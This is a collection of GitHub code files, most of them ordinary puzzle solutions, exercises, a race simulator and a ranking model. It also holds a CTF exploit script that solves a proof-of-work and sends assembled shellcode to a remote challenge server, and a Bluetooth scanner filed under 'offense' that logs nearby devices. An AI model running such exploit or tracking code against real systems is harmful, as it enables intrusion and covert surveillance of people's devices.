{"seq_id":"17346079167","text":"#10 - Sir Lancelot's Charge\r\ninput = open('input.txt', 'r')\r\ninputs = input.readlines()\r\ninputInts = [int(i) for i in inputs]\r\ninputInts.sort()\r\nnumAdapters = len(inputInts)\r\ninputInts.append(inputInts[numAdapters-1] +3)\r\n#inputInts.append(inputInts\r\nprint (inputInts)\r\ni, oneJolt, threeJolts, highJoltage = 0,0,0,0\r\nfor adaptor in inputInts:\r\n\tprint (i, \"#\")\r\n\tlastJoltage = 0\r\n\tthisJoltage = adaptor\r\n\tif i > 0: lastJoltage = inputInts[i-1]\r\n\tdiff = thisJoltage - lastJoltage\r\n\tprint (thisJoltage, \"-\", lastJoltage, \"=\", diff)\r\n\tif diff == 1: oneJolt += 1\r\n\tif diff == 3: threeJolts +=1\r\n\ti += 1\r\nhighJoltage = oneJolt * threeJolts\r\nprint (highJoltage, \"jolts\")\r\n \r\n\t","repo_name":"EmceeN/advent20","sub_path":"10/10a.py","file_name":"10a.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"37444564803","text":"\nimport sqlite3\nimport bluetooth as blue\nfrom time import sleep\n\nfound_devs = []\nconn = sqlite3.connect('blue.db')\nc = conn.cursor()\n\ndef find_devices():\n    print(\"[#] looking for devices\")\n    dev_list = blue.discover_devices()\n    for device in dev_list:\n        if device not in found_devs:\n            found_devs.append(device)\n            name = str(blue.lookup_name(device))\n            print(\"[*] found device name: [{}] [{}]\".format(name, device))\n            t = (device, name)\n            c.execute(\"INSERT INTO blue_devices VALUES (?,?)\", t)\n            conn.commit()\n    \ndef main():\n    while True:\n        find_devices()\n        sleep(5)\n    find_devices()\n    \nif 
__name__==\"__main__\":\n main()","repo_name":"Shiro-Nakamura/Hacking","sub_path":"offense/blue_collect.py","file_name":"blue_collect.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27409530632","text":"from ex115.ferramentas.opcao import menu\nfrom ex115.ferramentas.titulo import cabecalho\nfrom ex115.ferramentas.arquivo import *\nfrom time import sleep\n\narq = 'cursoemvideo.txt'\n\nif not arquivoExiste(arq):\n criarArquivo(arq)\nwhile True:\n resposta = menu(['Ver pessoas cadastradas', 'Cadastrar nova Pessoa', 'Sair do Sistema'])\n sleep(1)\n if resposta == 1:\n lerArquivo(arq)\n elif resposta == 2:\n cadastrar(arq, 'Nome: ', 'Idade: ')\n elif resposta == 3:\n cabecalho('FINALIZADO... VOLTE SEMPRE!')\n break\n sleep(2)\n","repo_name":"caiosm01/CursoEmVideo_PythonExercicios","sub_path":"ex115/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39968449361","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport argparse\nimport re\nimport sys\nimport os\n\nimport socket\n\ndef createMessage(serverName):\n return 'WHEREIS '+ serverName +'\\r\\n'\n\n\ndef createFTP(fileName, serverName):\n return ('GET '+ fileName + ' FSP/1.0\\r\\n'\n + 'Agent: xstepa64\\r\\n' \n + 'Hostname: '+ serverName + '\\r\\n\\r\\n')\n\n\ndef fileCopyFTP(TCP_file_name, serverName, fileNameForCreate, TCP_server_adress, TCP_server_port, path):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((TCP_server_adress, TCP_server_port))\n messageFTP = createFTP(TCP_file_name, serverName)\n sock.sendall(messageFTP.encode())\n\n filePath = path + '/' + re.sub(fileNameForCreate, '', TCP_file_name)\n\n try:\n os.makedirs(filePath)\n except OSError:\n try:\n os.chdir(filePath)\n except OSError:\n os.chdir(path)\n else:\n os.chdir(filePath)\n\n counter = 0\n try:\n with open(fileNameForCreate, 'wb') as f:\n while True:\n try: \n sock.settimeout(30)\n data = sock.recv(1024)\n except socket.timeout:\n sys.exit('time is over') \n \n if not data:\n break\n if(not re.search('FSP/1.0 Success', data.decode('latin-1')) and counter == 0):\n sys.exit('this file does not exist')\n elif(counter == 0):\n data = re.sub(b\".+?\\r\\n.+?\\r\\n\\r\\n\", b'', data)\n f.write(data)\n \n \n counter+=1\n\n f.close()\n except PermissionError:\n sys.exit('Permission Error') \n sock.close()\n\n\nparser = argparse.ArgumentParser(description='Program needs two arguments')\nparser.add_argument('-n', help='IP and port number', required=True)\nparser.add_argument('-f', help='Local adress of file', required=True)\nargs = vars(parser.parse_args())\n\ntry:\n # 127.0.0.1\n serverAdress = re.search('^[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+(?=:)', args['n']).group(0)\n # 3333\n serverPort = int(re.search('(?<=:)[0-9]+$', args['n']).group(0))\n # server.one\n serverName = re.search('(?<=^fsp:\\/\\/).+?(?=\\/)', args['f']).group(0)\n TCP_file_name = re.sub('^fsp://.+?/', '', args['f'])\n fileNameForCreate = re.sub('^fsp://.+/', '', args['f'])\n \n \nexcept AttributeError:\n sys.exit('wrong arguments')\n\n\n\ntry: \n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n message = createMessage(serverName)\n\n clientSocket.sendto(message.encode(), (serverAdress, serverPort))\nexcept socket.gaierror:\n sys.exit('wrong server adress or server port')\n\ntry: \n 
clientSocket.settimeout(30)\n receivedMessage, serverAddr = clientSocket.recvfrom(4096)\nexcept socket.timeout:\n sys.exit('time is over') \n\nclientSocket.close()\n\n\nTCP_server_adress = re.search('(?<=OK ).+(?=:)', receivedMessage.decode('utf-8')).group(0)\nTCP_server_port = int(re.search('(?<=:)[0-9]+$', receivedMessage.decode('utf-8')).group(0))\n\n\npath = os.getcwd()\n\nif(fileNameForCreate == '*'):\n TCP_file_name = 'index'\n fileCopyFTP(TCP_file_name, serverName, 'index', TCP_server_adress, TCP_server_port, path)\n with open('index', 'r') as data:\n for line in data:\n line = re.sub(\"\\n\", '', line)\n try:\n fileCopyFTP(line, serverName, re.sub(\".*/\", '', line), TCP_server_adress, TCP_server_port, path)\n except FileNotFoundError:\n sys.exit('file not found')\n \nelse:\n fileCopyFTP(TCP_file_name, serverName, fileNameForCreate, TCP_server_adress, TCP_server_port, path)\n\n\n\n\n","repo_name":"lnearlol/IPK","sub_path":"projekt1/fileget.py","file_name":"fileget.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13694576452","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if len(needle) == 0:\n return 0\n \n length = len(haystack)\n needle_len = len(needle)\n for i in range(length):\n if i+needle_len > length:\n break\n \n s = haystack[i:i+needle_len]\n if s == needle:\n return i\n \n return -1\n","repo_name":"pdkz/leetcode","sub_path":"0028_Implement_strStr()/0028_Implement_strStr().py","file_name":"0028_Implement_strStr().py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19511964946","text":"import random, time\n\ntracks = {\n \"Bahrain\": {\"CIRC\": \"Bahrain International Circuit\", \"LAPS\": 57, 'POLE': 90.558, \"RAIN\": 0},\n \"Jeddah\": {\"CIRC\": \"Jeddah Street Circuit\", \"LAPS\": 50, 'POLE': 88.2, \"RAIN\": 0},\n \"Melbourne\": {\"CIRC\": \"Albert Park Circuit\", \"LAPS\": 58, 'POLE': 77.868, \"RAIN\": 20},\n \"Imola\": {\"CIRC\": \"Autodromo Enzo e Dino Ferrari\", \"LAPS\": 63, 'POLE': 87.999, \"RAIN\": 30},\n \"Miami\": {\"CIRC\": \"Miami International Autodrome\", \"LAPS\": 57, 'POLE': 88.796, \"RAIN\": 15},\n \"Barcelona\": {\"CIRC\": \"Circuit de Barcelona-Catalunya\", \"LAPS\": 66, 'POLE': 79.750, \"RAIN\": 15},\n \"Monaco\": {\"CIRC\": \"Circuit de Monaco\", \"LAPS\": 78, 'POLE': 71.376, \"RAIN\": 60},\n \"Baku\": {\"CIRC\": \"Baku City Circuit\", \"LAPS\": 51, 'POLE': 101.359, \"RAIN\": 20},\n \"Montreal\": {\"CIRC\": \"Circuit Gilles Villeneuve\", \"LAPS\": 70, 'POLE': 81.299, \"RAIN\": 50},\n \"Silverstone\": {\"CIRC\": \"Silverstone Circuit\", \"LAPS\": 52, 'POLE': 100.983, \"RAIN\": 40},\n \"Austria\": {\"CIRC\": \"Red Bull Ring\", \"LAPS\": 71, 'POLE': 64.984, \"RAIN\": 30},\n \"Paul Ricard\": {\"CIRC\": \"Circuit Paul Ricard\", \"LAPS\": 53, 'POLE': 90.872, \"RAIN\": 20},\n \"Budapest\": {\"CIRC\": \"Hungaroring\", \"LAPS\": 70, 'POLE': 77.377, \"RAIN\": 55},\n \"Belgium\": {\"CIRC\": \"Circuit de Spa-Francorchamps\", \"LAPS\": 44, 'POLE': 103.665, \"RAIN\": 50},\n \"Zandvoort\": {\"CIRC\": \"Circuit Zandvoort\", \"LAPS\": 72, 'POLE': 70.342, \"RAIN\": 20},\n \"Monza\": {\"CIRC\": \"Autodromo Nazionale di Monza\", \"LAPS\": 53, 'POLE': 80.161, \"RAIN\": 20},\n \"Singapore\": {\"CIRC\": \"Marina Bay Street Circuit\", \"LAPS\": 61, 'POLE': 109.412, \"RAIN\": 75},\n \"Suzuka\": {\"CIRC\": \"Suzuka Intl. 
Racing Course\", \"LAPS\": 53, 'POLE': 89.304, \"RAIN\": 40},\n \"Austin\": {\"CIRC\": \"CIRC of The Americas\", \"LAPS\": 56, 'POLE': 94.356, \"RAIN\": 15},\n \"Mexico\": {\"CIRC\": \"Autodromo Hermanos Rodriguez\", \"LAPS\": 71, 'POLE': 77.775, \"RAIN\": 20},\n \"Brazil\": {\"CIRC\": \"Autodromo Jose Carlos Pace\", \"LAPS\": 71, 'POLE': 71.674, \"RAIN\": 85},\n \"Abu Dhabi\": {\"CIRC\": \"Yas Marina Circuit\", \"LAPS\": 55, 'POLE': 83.8241, \"RAIN\": 0},\n}\n\ndrivers = {\n \"VER\": {\"Team\": \"Red Bull\", \"QUA\": 95, \"RAC\": 95, \"AWA\": 91, \"EXP\": 78, \"REL\": 90, \"STR\": 95},\n \"LEC\": {\"Team\": \"Ferrari\", \"QUA\": 94, \"RAC\": 91, \"AWA\": 92, \"EXP\": 72, \"REL\": 89, \"STR\": 79},\n \"PER\": {\"Team\": \"Red Bull\", \"QUA\": 89, \"RAC\": 90, \"AWA\": 91, \"EXP\": 84, \"REL\": 90, \"STR\": 95},\n \"RUS\": {\"Team\": \"Mercedes\", \"QUA\": 88, \"RAC\": 88, \"AWA\": 83, \"EXP\": 70, \"REL\": 95, \"STR\": 71},\n \"SAI\": {\"Team\": \"Ferrari\", \"QUA\": 91, \"RAC\": 89, \"AWA\": 89, \"EXP\": 78, \"REL\": 89, \"STR\": 79},\n \"HAM\": {\"Team\": \"Mercedes\", \"QUA\": 87, \"RAC\": 87, \"AWA\": 95, \"EXP\": 91, \"REL\": 95, \"STR\": 71},\n \"NOR\": {\"Team\": \"McLaren\", \"QUA\": 86, \"RAC\": 80, \"AWA\": 86, \"EXP\": 70, \"REL\": 92, \"STR\": 89},\n \"OCO\": {\"Team\": \"Alpine\", \"QUA\": 80, \"RAC\": 79, \"AWA\": 82, \"EXP\": 73, \"REL\": 75, \"STR\": 77},\n \"ALO\": {\"Team\": \"Alpine\", \"QUA\": 84, \"RAC\": 79, \"AWA\": 79, \"EXP\": 95, \"REL\": 75, \"STR\": 77},\n \"BOT\": {\"Team\": \"Alfa Romeo\", \"QUA\": 79, \"RAC\": 76, \"AWA\": 93, \"EXP\": 81, \"REL\": 77, \"STR\": 66},\n \"RIC\": {\"Team\": \"McLaren\", \"QUA\": 76, \"RAC\": 71, \"AWA\": 71, \"EXP\": 84, \"REL\": 92, \"STR\": 89},\n \"VET\": {\"Team\": \"Aston Martin\", \"QUA\": 75, \"RAC\": 75, \"AWA\": 87, \"EXP\": 90, \"REL\": 92, \"STR\": 76},\n \"MAG\": {\"Team\": \"Haas\", \"QUA\": 78, \"RAC\": 70, \"AWA\": 82, \"EXP\": 76, \"REL\": 92, \"STR\": 65},\n \"GAS\": {\"Team\": \"AlphaTauri\", \"QUA\": 77, \"RAC\": 72, \"AWA\": 65, \"EXP\": 73, \"REL\": 89, \"STR\": 79},\n \"STR\": {\"Team\": \"Aston Martin\", \"QUA\": 71, \"RAC\": 72, \"AWA\": 71, \"EXP\": 74, \"REL\": 92, \"STR\": 76},\n \"MSC\": {\"Team\": \"Haas\", \"QUA\": 73, \"RAC\": 69, \"AWA\": 86, \"EXP\": 67, \"REL\": 92, \"STR\": 65},\n \"TSU\": {\"Team\": \"AlphaTauri\", \"QUA\": 75, \"RAC\": 70, \"AWA\": 75, \"EXP\": 67, \"REL\": 89, \"STR\": 79},\n \"ZHO\": {\"Team\": \"Alpha Romeo\", \"QUA\": 73, \"RAC\": 70, \"AWA\": 79, \"EXP\": 65, \"REL\": 77, \"STR\": 66},\n \"ALB\": {\"Team\": \"Williams\", \"QUA\": 73, \"RAC\": 71, \"AWA\": 66, \"EXP\": 68, \"REL\": 92, \"STR\": 74},\n \"LAT\": {\"Team\": \"Williams\", \"QUA\": 65, \"RAC\": 65, \"AWA\": 74, \"EXP\": 69, \"REL\": 92, \"STR\": 74},\n}\n\nweather = {\n \"Sunny\": {\"TEMP\": 26, \"DELT\": 1},\n \"Light Cloud\": {\"TEMP\": 22, \"DELT\": 1.005},\n \"Cloudy\": {\"TEMP\": 16, \"DELT\": 1.01},\n \"Light Rain\": {\"TEMP\": 15, \"DELT\": 1.1},\n \"Heavy Rain\": {\"TEMP\": 14, \"DELT\": 1.15}\n}\n\nfor driver, data in drivers.items():\n drivers[driver][\"GRI\"] = 0\n drivers[driver][\"TIM\"] = 0\n drivers[driver][\"TOT\"] = 0\n drivers[driver][\"DNF\"] = False\n\nprint(\"\\n------------------------------------\\n\\nWelcome to skyv1111's F1 Simulator!\\n\")\n\nfor i, (l, r) in enumerate(zip(list(tracks.items())[:len(list(tracks.items())) // 2], list(tracks.items())[len(list(tracks.items())) // 2:])):\n print(f\"{i + 1:2}. {l[0]:15s} {i + len(list(tracks.items())) // 2 + 1:2}. 
{r[0]:30s}\")\n\nsel_track = input(\"\\nSelect a track: \").lower()\n\nwhile sel_track.lower() not in [t.lower() for t in tracks.keys()] and not any(str(i + 1) == sel_track for i in range(len(tracks))):\n sel_track = input(\"\\nInvalid track. Select a track: \").lower()\n\nif sel_track.isdigit():\n sel_track = list(tracks.keys())[int(sel_track) - 1]\nelse:\n sel_track = [t for t in tracks.keys() if t.lower() == sel_track][0]\n\ndef simulate_qualifying(drivers):\n\n print(\"\\n------------------------------------\\n\\nQualifying Information:\")\n\n track = tracks[sel_track][\"CIRC\"]\n pole = tracks[sel_track][\"POLE\"]\n rain = tracks[sel_track][\"RAIN\"]\n\n grid_penalties = []\n\n if rain == 0:\n cond = random.choice([\"Sunny\", \"Light Cloud\"])\n elif rain > 50:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", ])\n else:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", \"Heavy Rain\"])\n\n temp = weather[cond][\"TEMP\"]\n temp_delta = weather[cond][\"DELT\"]\n\n print(f\"\\nCircuit: {track}\\nWeather: {cond}\\nTemperature: {temp + random.randint(-3, 3)}°C\")\n\n for driver, data in drivers.items():\n if cond == \"Light Rain\" or cond == \"Heavy Rain\":\n qualifying_time = pole + temp_delta + random.uniform(-0.1, 1.9) + 9.5 - (data[\"QUA\"] / 10)\n elif cond in [\"Sunny\", \"Light Cloud\", \"Cloudy\"]:\n qualifying_time = pole + temp_delta + random.uniform(-0.1, 0.9) + 9.5 - (data[\"QUA\"] / 10)\n data[\"TIM\"] = qualifying_time\n\n sorted_grid = sorted(drivers.items(), key=lambda x: x[1][\"TIM\"])\n\n for i, (driver, data) in enumerate(sorted_grid):\n if random.random() < 0.01:\n grid_penalty = random.choice([5, 10, 15, 20])\n drivers[driver][\"GRI\"] = i + 1 + grid_penalty\n grid_penalties.append((driver, grid_penalty))\n else:\n drivers[driver][\"GRI\"] = i + 1\n drivers[driver][\"TIM\"] = data[\"TIM\"]\n\n if grid_penalties:\n print(\"Grid Penalties: \", end=\"\")\n for i, (driver, penalty) in enumerate(grid_penalties):\n if i == 0:\n print(f\"{driver} ({penalty})\")\n else:\n print(f\"\\t\\t\\t {driver} ({penalty})\")\n\n sorted_grid = sorted(drivers.items(), key=lambda x: x[1][\"GRI\"])\n\n print(\"\\n------------------------------------\\n\\nStarting Grid:\\n\")\n\n\n for i in range(0, len(sorted_grid), 2):\n left_driver = sorted_grid[i]\n right_driver = sorted_grid[i + 1] if i + 1 < len(sorted_grid) else None\n left_time = f\"{left_driver[1]['TIM'] // 60:1.0f}:{left_driver[1]['TIM'] % 60:06.3f}\"\n right_time = f\"{'':>5}{right_driver[1]['TIM'] // 60:1.0f}:{right_driver[1]['TIM'] % 60:06.3f}\"\n\n print(f\"{i + 1:2}. {left_driver[0]:<15s}{i + 2:2}. 
{right_driver[0]:<2s}\")\n        print(f\"{'':>4}{left_time:14}{right_time}\")\n\n\n\ndef simulate_race(drivers):\n    print(\"\\n------------------------------------\\n\\nRace Information:\")\n\n    rain_chance = tracks[sel_track][\"RAIN\"]\n    if rain_chance == 0:\n        cond = random.choice([\"Sunny\", \"Light Cloud\"])\n    elif rain_chance > 50:\n        cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", ])\n    else:\n        cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", \"Heavy Rain\"])\n\n    track = tracks[sel_track][\"CIRC\"]\n    temp = weather[cond][\"TEMP\"] + random.randint(-3, 3)\n    temp_delta = weather[cond][\"DELT\"]\n    pole = tracks[sel_track][\"POLE\"]\n\n    print(f\"\\nCircuit: {track}\\nWeather: {cond}\\nTemperature: {temp}°C\\n\")\n\n    print(\"------------------------------------\\n\")\n\n    race_results = {}\n\n    for lap in range(1, tracks[sel_track][\"LAPS\"] + 1):\n\n        for driver in drivers:\n\n            # per-driver grid handicap: 1% of pole pace per starting position\n            grid = 1.0 + (drivers[driver][\"GRI\"] - 1) * 0.01\n            if lap <= 10:\n                lap_time = (pole * grid + random.uniform(-0.1, 2) + 9.5 - (drivers[driver][\"RAC\"] / 10)) * temp_delta\n            else:\n                lap_time = (pole * grid + random.uniform(-0.1, 0.5) + 9.5 - (drivers[driver][\"RAC\"] / 10)) * temp_delta\n\n            leader = min(drivers.items(), key=lambda x: x[1][\"TOT\"])\n\n            if leader[0] != driver:\n                delta_time = drivers[leader[0]][\"TOT\"] - drivers[driver][\"TOT\"]\n                if delta_time <= 1:\n                    lap_time -= 0.25\n\n            drivers[driver][\"TOT\"] += lap_time\n\n        sorted_race = sorted(drivers.items(), key=lambda x: x[1][\"TOT\"])\n\n        lap_leader = sorted_race[0][0]\n\n        print(f\"[Lap {lap} / {tracks[sel_track]['LAPS']}] \\n {lap_leader} leads\")\n\n        prev_leader = lap_leader\n\n        leader_lap_time = sorted_race[0][1][\"TOT\"]\n        leader_avg_lap = leader_lap_time / lap\n\n    print()\n\n    # Print race results (TEMP)\n\n    for i in range(0, len(sorted_race), 2):\n        left_driver = sorted_race[i]\n        right_driver = sorted_race[i + 1] if i + 1 < len(sorted_race) else None\n\n        left_time = f\"{left_driver[1]['TOT'] // 60:1.0f}:{left_driver[1]['TOT'] % 60:06.3f}\"\n        right_time = f\"{'':>5}{right_driver[1]['TOT'] // 60:1.0f}:{right_driver[1]['TOT'] % 60:06.3f}\"\n\n        print(f\"{i + 1:2}. {left_driver[0]:<15s}{i + 2:2}. 
{right_driver[0]:<2s}\")\n print(f\"{'':>4}{left_time:14}{right_time}\")\n\nsimulate_qualifying(drivers)\nsimulate_race(drivers)\n","repo_name":"skyv1111/py-f1-simulator","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23577060791","text":"from __future__ import print_function\nimport sys\nimport numpy as np\nimport math\n\ndef getminmax(x, r):\n low = ((x * 10)+(11*r)-1) // (11*r)\n high = (x * 10) // (9*r)\n if low <= high:\n return (low, high)\n return (0,0)\n\ndef overlaps(x, y):\n return x[0] <= y[1] and y[0] <= x[1]\n\ndef getnumpackages(N, P, R, plist):\n #Get min, max servings\n mmlist = []\n for x in range(N):\n mmlist.append([])\n line = np.sort(plist[x])\n for y in range(P):\n z = getminmax(line[y], R[x])\n if z[1] != 0:\n mmlist[x].append(z)\n #Go through list finding packages\n count = 0\n ilist = [0] * N\n for x in mmlist[0]:\n found = True\n for row in range(1,N):\n if ilist[row] >= len(mmlist[row]):\n return count\n while mmlist[row][ilist[row]][1] < x[0]:\n ilist[row] += 1\n if ilist[row] >= len(mmlist[row]):\n return count\n if not overlaps(x, mmlist[row][ilist[row]]):\n found = False\n break\n if found:\n count += 1\n for row in range(1,N):\n ilist[row] += 1\n \n return count\n\n#Read data\nif len(sys.argv) < 2:\n print(\"Missing input file name\")\n quit()\nwith open(sys.argv[1], \"r\") as f:\n T = int(f.readline())\n for x in range(T):\n plist = []\n N, P = [int(z) for z in f.readline().split()]\n R = [int(z) for z in f.readline().split()]\n for y in range(N):\n plist.append([int(z) for z in f.readline().split()])\n print(\"Case #%d: %d\" % (x + 1, getnumpackages(N, P, R, plist)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_204/188.py","file_name":"188.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26097396990","text":"from pwn import *\nimport os, string, hashlib\nfrom multiprocessing import Pool\n\n\ndef solve_hash(k):\n target = hash\n chars = string.ascii_letters + string.digits\n sha256 = hashlib.sha256\n suffix1 = k.encode() + suffix\n for a in chars:\n for b in chars:\n for c in chars:\n for d in chars:\n if sha256((a + b + c + d).encode() + suffix1).digest() == target:\n res = (a + b + c + d).encode() + suffix1\n print('found', res)\n return res\n return None\n\n\nif __name__ == '__main__':\n n = 2088\n s = []\n t = n - 1 - 99\n s.append(b'a' * 99)\n cur = 97\n while t:\n cur += 1\n u = min(t, 98)\n s.append(b'a' + bytes([cur]) * u)\n t -= u\n s.append(b'\\x0500')\n\n os.system('python3 asm.py exp.S /tmp/exp1 > /tmp/exp')\n exp = bytes(eval(open('/tmp/exp').read()))\n for x in [b'\\0', b'\\r', b'\\n']:\n assert x not in exp\n\n exp = b'\\x05' + b'0' * 9 + exp + (7915999 + 1 - 7915876 - len(exp)) * b'0' + b'flag'\n payload = b'%d\\n' % len(s) + b'\\n'.join(s) + b'\\n1\\n' + exp + b'\\n'\n\n r = remote('120.24.57.117', 47987)\n #r = remote('47.106.193.146', 41890)\n #context.log_level = 'debug'\n if 1:\n r.recvuntil('sha256(?????+\"')\n suffix = r.recv(15)\n r.recvuntil('==')\n hash = bytes.fromhex(r.recv(64).decode())\n print(suffix, hash)\n p = Pool(8)\n chars = string.ascii_letters + string.digits\n for x in p.map(solve_hash, chars):\n if x is not None:\n r.sendline(x[:5])\n if 0:\n r.recvuntil('Input number of template strings: ')\n r.sendline('100')\n for i 
in range(1000):\n time.sleep(1)\n r.recvuntil('Template string')\n r.sendline('1')\n print(i)\n r.send(payload)\n r.interactive() # be patient\n","repo_name":"mcfx/trivm","sub_path":"challenges/string/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"32585098698","text":"import sys\r\nsys.path.append('/home/mshah1/narrativeQA/NN4NLP-Project/src')\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom ReadingComprehension.IterativeReattentionAligner.modules import (InteractiveAligner, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tSelfAligner, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tSummarizer, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tAnswerPointer)\r\nfrom utils.utils import *\r\n\r\nclass GaussianKernel(object):\r\n\t\"\"\"docstring for GaussianKernel\"\"\"\r\n\tdef __init__(self, mean, std):\r\n\t\tsuper(GaussianKernel, self).__init__()\r\n\t\tself.mean = mean\r\n\t\tself.std = std\r\n\r\n\tdef __call__(self, x):\r\n\t\tsim = torch.exp(-0.5 * (x-self.mean)**2 / self.std**2)\r\n\t\treturn sim\r\n\t\t\r\n\r\nclass KNRM(nn.Module):\r\n\t\"\"\"docstring for ConvKNRM\"\"\"\r\n\tdef __init__(self, init_emb=None, emb_trainable=True, vocab_size=None, \r\n\t\t\t\t\temb_dim=100, nkernels=11, sigma=0.1, exact_sigma=0.001, dropout=0.3):\r\n\t\tsuper(KNRM, self).__init__()\r\n\t\tif init_emb is not None:\r\n\t\t\tself.emb = nn.Embedding.from_pretrained(init_emb, \r\n\t\t\t\t\t\t\t\t\t\tfreeze=(not emb_trainable))\r\n\t\telse:\r\n\t\t\tself.emb = nn.Embedding(vocab_size, emb_dim)\r\n\t\t\r\n\t\tself.kernels = []\r\n\t\tfor i in range(nkernels):\r\n\t\t\tmu = 1/(nkernels-1) + 2*i/(nkernels-1) - 1\r\n\r\n\t\t\tif mu > 1:\r\n\t\t\t\tself.kernels.append(GaussianKernel(1., exact_sigma))\r\n\t\t\telse:\r\n\t\t\t\tself.kernels.append(GaussianKernel(mu, sigma))\r\n\t\t\r\n\r\n\t\tself.linear = nn.Linear(nkernels, 1, bias=False)\r\n\t\tself.dropout = nn.Dropout(dropout)\r\n\tdef embed(self, x):\t\t\r\n\t\tx_emb = self.emb(x[:,:,0])\r\n\t\tx_emb = x_emb / (torch.norm(x_emb, dim=2, keepdim=True) + 1e-10)\r\n\t\treturn x_emb\r\n\r\n\tdef score(self, q_emb, d_emb, qlen, dlen):\r\n\t\tsim = torch.bmm(q_emb, d_emb.transpose(1,2))\r\n\t\tsim = self.dropout(sim)\r\n\r\n\t\tkernel_counts = []\r\n\t\tfor K in self.kernels:\r\n\t\t\tprobs = K(sim)\r\n\t\t\tqt_match_count = torch.sum(probs, dim=2)\t\t\t\t\t\r\n\t\t\ttotal_count = torch.sum(torch.log1p(qt_match_count), dim=1)\r\n\t\t\t\r\n\t\t\tif not torch.isfinite(total_count).all():\r\n\t\t\t\tprint('bad total_count')\r\n\t\t\t\tprint(total_count)\r\n\t\t\t\tprint(torch.min(probs))\r\n\t\t\t\tprint(torch.min(qt_match_count))\r\n\t\t\t\tprint(torch.min(sim))\r\n\t\t\t\tprint(torch.min(q_emb))\r\n\t\t\t\tprint(torch.min(d_emb))\r\n\t\t\t\treturn\r\n\r\n\t\t\tkernel_counts.append(total_count)\r\n\t\tkernel_counts = torch.stack(kernel_counts, dim=1)\r\n\r\n\t\tscore = self.linear(kernel_counts).squeeze(1)\r\n\t\treturn score\r\n\r\n\tdef forward(self, q, d, qlen, dlen):\r\n\t\tif not torch.isfinite(q).all():\r\n\t\t\tprint('bad q')\r\n\t\t\tprint(q)\r\n\t\t\tprint(d)\r\n\t\t\treturn\r\n\t\tq_emb = self.embed(q)\r\n\t\td_emb = self.embed(d)\r\n\t\tscore = self.score(q_emb, d_emb, qlen, dlen)\t\t\r\n\t\tscore += 1e-10\r\n\t\treturn score\r\n\r\n\tdef getSentScores(self, q, c, qlen, clen, batch_size):\t\t\r\n\t\tscores = torch.zeros(c.shape[0]).float().to(c.device)\r\n\t\tn_batches = (c.shape[0] + batch_size - 1) // 
batch_size\r\n\t\tfor i in range(n_batches):\r\n\t\t\tc_batch = c[i*batch_size:(i+1)*batch_size]\t\t\t\r\n\t\t\tclen_batch = clen[i*batch_size:(i+1)*batch_size]\r\n\r\n\t\t\tq_batch = q[i*batch_size:(i+1)*batch_size]\r\n\t\t\tqlen_batch = qlen[i*batch_size:(i+1)*batch_size]\r\n\r\n\t\t\t# print(c_batch.shape, clen_batch.shape)\r\n\t\t\t# print(q_batch.shape, qlen_batch.shape)\r\n\r\n\t\t\tscores[i*batch_size:(i+1)*batch_size] = self.score(q_batch, c_batch, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tqlen_batch, clen_batch)\r\n\t\treturn scores\r\n\r\n\tdef forward_singleContext(self, q, d, qlen, dlen, batch_size=1024):\r\n\t\tq = self.embed(q)\r\n\t\td = self.embed(d)\r\n\r\n\t\tscores = []\r\n\t\tfor i in range(q.shape[0]):\r\n\t\t\tq_ = q[i, :qlen[i]]\r\n\t\t\tq_ = q_.expand(d.shape[0], -1, -1)\r\n\r\n\t\t\tqlen_ = qlen[i:i+1].expand(q_.shape[0])\t\r\n\r\n\t\t\t# print(torch.cuda.memory_allocated(0) / (1024)**3)\r\n\t\t\t# c_scores = self.score(q_, d, qlen_, dlen)\r\n\t\t\tc_scores = self.getSentScores(q_, d, qlen_, dlen, batch_size)\r\n\t\t\t# print(c_scores.shape)\r\n\r\n\t\t\tscores.append(c_scores)\r\n\r\n\t\tscores = torch.stack(scores, dim=0)\r\n\t\treturn scores\r\n\r\nif __name__ == '__main__':\r\n\tq = torch.LongTensor(torch.randint(10, size=(2,10,2)).long())\r\n\td = torch.LongTensor(torch.randint(3, size=(3,4,2)).long())\r\n\tqlen = torch.LongTensor([1,2])\r\n\tdlen = torch.LongTensor([2,3])\r\n\r\n\tm = KNRM(vocab_size=20)\r\n\tprint(m.forward_singleContext(q, d, qlen, 